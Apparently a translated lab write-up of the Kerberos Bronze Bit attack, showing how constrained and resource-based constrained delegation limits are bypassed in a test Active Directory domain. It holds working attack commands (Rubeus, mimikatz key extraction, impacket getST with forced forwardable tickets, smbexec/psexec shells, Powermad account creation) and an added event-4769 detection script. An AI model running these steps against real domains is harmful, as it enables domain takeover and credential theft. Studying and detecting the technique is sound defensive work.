
Bypassing constrained delegation / resource-based constrained delegation restrictions: the Kerberos Bronze Bit attack


This Wind


Overview

This vulnerability gets around two restrictions:
1. Protocol transition is disabled
2. Protected Users and accounts marked "sensitive, cannot be delegated" cannot be delegated
Concretely, on the DC the Service1 computer account is configured for "Use Kerberos only" rather than "Use any authentication protocol".

Domain environment

DC: WIN-5CHMN9C4UES.YAYI.local (Windows Server 2012)
Two domain-joined machines:
one2008.YAYI.local (Windows Server 2008)
WIN-BMIO66D4K15.YAYI.local (Windows 7)

Domain users:
fwwr
joke

Bypassing traditional constrained delegation

Service account:

[screenshot]

Delegation target: the machine WIN-5CHMN9C4UES.YAYI.local

[screenshot]
[screenshot]

Standard constrained delegation abuse:

1. Obtain the credentials of the account configured for constrained delegation
2. Identify the target machine that account is allowed to delegate to
3. Obtain the RC4 key and use it

Listing machines configured for constrained delegation with PowerView:
Get-DomainComputer -TrustedToAuth -Properties distinguishedname,msds-allowedtodelegateto | fl
[screenshot]

A single Rubeus command performs the constrained delegation:

Rubeus.exe s4u /user:fwwr /domain:YAYI.local /rc4:ca69e7f0f02d9156d1616ba6abd395b6 /impersonateuser:administrator /msdsspn:"dhcp/WIN-5CHMN9C4UES.YAYI.local/YAYI.local" /altservice:cifs /ptt

Because the user is marked "Account is sensitive and cannot be delegated", this fails:

[screenshot]

Bypass with a recent impacket (latest version at the time of writing: 0.9.22; minimum required version: 0.9.21).
First log on to the one2008 machine and extract the AES and RC4 keys with mimikatz:

privilege::debug
sekurlsa::ekeys
[screenshot]

Obtain the TGT, import it, and connect with smbexec:

python3 getST.py -spn cifs/WIN-5CHMN9C4UES.YAYI.local -impersonate administrator -hashes AAD3B435B51404EEAAD3B435B51404EE:0adce35e9d541588782a98fe1fce59cf -aesKey 56f41eb095b4099b27934963200180321742c6f89db55bff02495b22b17afe69 YAYI.local/one2008 -force-forwardable
export KRB5CCNAME=administrator.ccache
sudo python3 smbexec.py -no-pass -k WIN-5CHMN9C4UES.YAYI.local
[screenshot]
[screenshot]
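The step above succeeds only because the service ticket returned by S4U2Self was made forwardable for an account that the KDC should never delegate. On the detection side, the corresponding signal is a successful S4U2Proxy request (Windows Security event 4769 with a populated Transited Services field) whose Account Name is a protected or "sensitive, cannot be delegated" account. The following Python is an added example from a defender's perspective and is not code from the original post: it applies that rule to event 4769 records represented as dicts. The sensitive-account list, the sample events and their Ticket Options values are constructed for the example; the field names are the ones event 4769 really carries.

```python
"""Hunt for delegation of protected accounts in Windows Security event 4769.

Added example, not code from the original post. Each event is a dict of
fields that event 4769 really carries (Account Name, Service Name,
Ticket Options, Transited Services, Failure Code). Transited Services is
populated only on S4U2Proxy (delegation) requests, so a *successful*
S4U2Proxy whose Account Name is an account the domain marks as
"sensitive, cannot be delegated" (or a Protected Users member) is a ticket
the KDC should never have issued. Sample data below is constructed.
"""

FORWARDABLE = 0x40000000  # Ticket Options bit for "forwardable"

# Constructed: accounts whose delegation is forbidden by policy.
SENSITIVE_ACCOUNTS = {"administrator"}


def is_s4u2proxy(event):
    """S4U2Proxy requests carry the delegating service in Transited Services."""
    transited = event.get("Transited Services", "-").strip()
    return transited not in ("", "-")


def ticket_is_forwardable(event):
    """Ticket Options is logged as a hex string such as 0x40810000."""
    return bool(int(event["Ticket Options"], 16) & FORWARDABLE)


def classify(event):
    """Return a finding string for a suspicious 4769, or None if it looks benign."""
    if event.get("Failure Code", "0x0") != "0x0":
        return None  # the KDC refused the request; nothing was issued
    if not is_s4u2proxy(event):
        return None
    impersonated = event["Account Name"].split("@")[0].lower()
    if impersonated not in SENSITIVE_ACCOUNTS:
        return None
    flags = " (forwardable)" if ticket_is_forwardable(event) else ""
    return "%s obtained %s as protected account %s%s" % (
        event["Transited Services"], event["Service Name"], impersonated, flags)


def hunt(events):
    """Run classify() over a batch of events and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f]


# Constructed sample events modelled on the lab described in the post.
SAMPLE_EVENTS = [
    {   # ordinary user requesting a service ticket for itself: benign
        "Account Name": "fwwr@YAYI.LOCAL", "Service Name": "one2008$",
        "Ticket Options": "0x40810000", "Transited Services": "-",
        "Failure Code": "0x0",
    },
    {   # S4U2Proxy refused (KDC_ERR_BADOPTION, 0xd) because the account is sensitive
        "Account Name": "administrator@YAYI.LOCAL", "Service Name": "WIN-5CHMN9C4UES$",
        "Ticket Options": "0x40820010", "Transited Services": "one2008$@YAYI.LOCAL",
        "Failure Code": "0xd",
    },
    {   # successful S4U2Proxy impersonating administrator: the outcome shown in the post
        "Account Name": "administrator@YAYI.LOCAL", "Service Name": "WIN-5CHMN9C4UES$",
        "Ticket Options": "0x40820010", "Transited Services": "one2008$@YAYI.LOCAL",
        "Failure Code": "0x0",
    },
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print("ALERT:", finding)
```

Only the third sample produces a finding; the refused request is ignored because the KDC issued nothing. The rule is intentionally narrow: the fix for this behaviour is the KDC patch, and this heuristic is a way to spot a domain controller that is still issuing tickets it should refuse.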

Bypassing resource-based constrained delegation

Set up the environment first: remove the delegation permission granted to service1 in the previous step.

[screenshot]

Use ADSI Edit to grant the domain user joke write permission on one2008.

[screenshot]

The user joke can log on to WIN-BMIO66D4K15. After logging on, use Powermad to add a new computer account AttackerService with the password AttackerServicePassword:

Import-Module .\powermad.ps1
New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force)
[screenshot]

Compute the hash with mimikatz:

[screenshot]

Use the PowerShell Active Directory module to add the resource-based constrained delegation, i.e. an inbound trust relationship from AttackerService to one2008:

Import-Module .\Microsoft.ActiveDirectory.Management.dll
Get-ADComputer AttackerService #confirm the machine account has been added
Set-ADComputer one2008 -PrincipalsAllowedToDelegateToAccount AttackerService$ #allow the new account to delegate to the target machine
Get-ADComputer one2008 -Properties PrincipalsAllowedToDelegateToAccount #verify that the account was successfully configured to delegate to the target machine
Get-DomainUser -Identity <user> -Properties objectsid #get a user's SID
Get-DomainObjectAcl -Identity one2008.YAYI.local | ?{$_.SecurityIdentifier -match "S-1-5-21-2799505025-1944254007-2887416074-1618"} #query a machine's ACL
[screenshot]

We now have full control over One2008.YAYI.local; simply request the TGT and connect remotely (the RC4 and AES keys here are the ones obtained with mimikatz above):

python3 getST.py -spn cifs/one2008.YAYI.local -impersonate administrator -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 537056f14b0f81bc6e4be6ddba7786efdadb813c61ed5a6dce1b YAYI.local/AttackerService -force-forwardable
export KRB5CCNAME=administrator.ccache
python3 psexec.py -no-pass -k one2008.YAYI.local
[screenshot]

References

https://y4er.com/post/kerberos-bronze-bit-attack/

https://422926799.github.io/posts/9cf32cdf.html
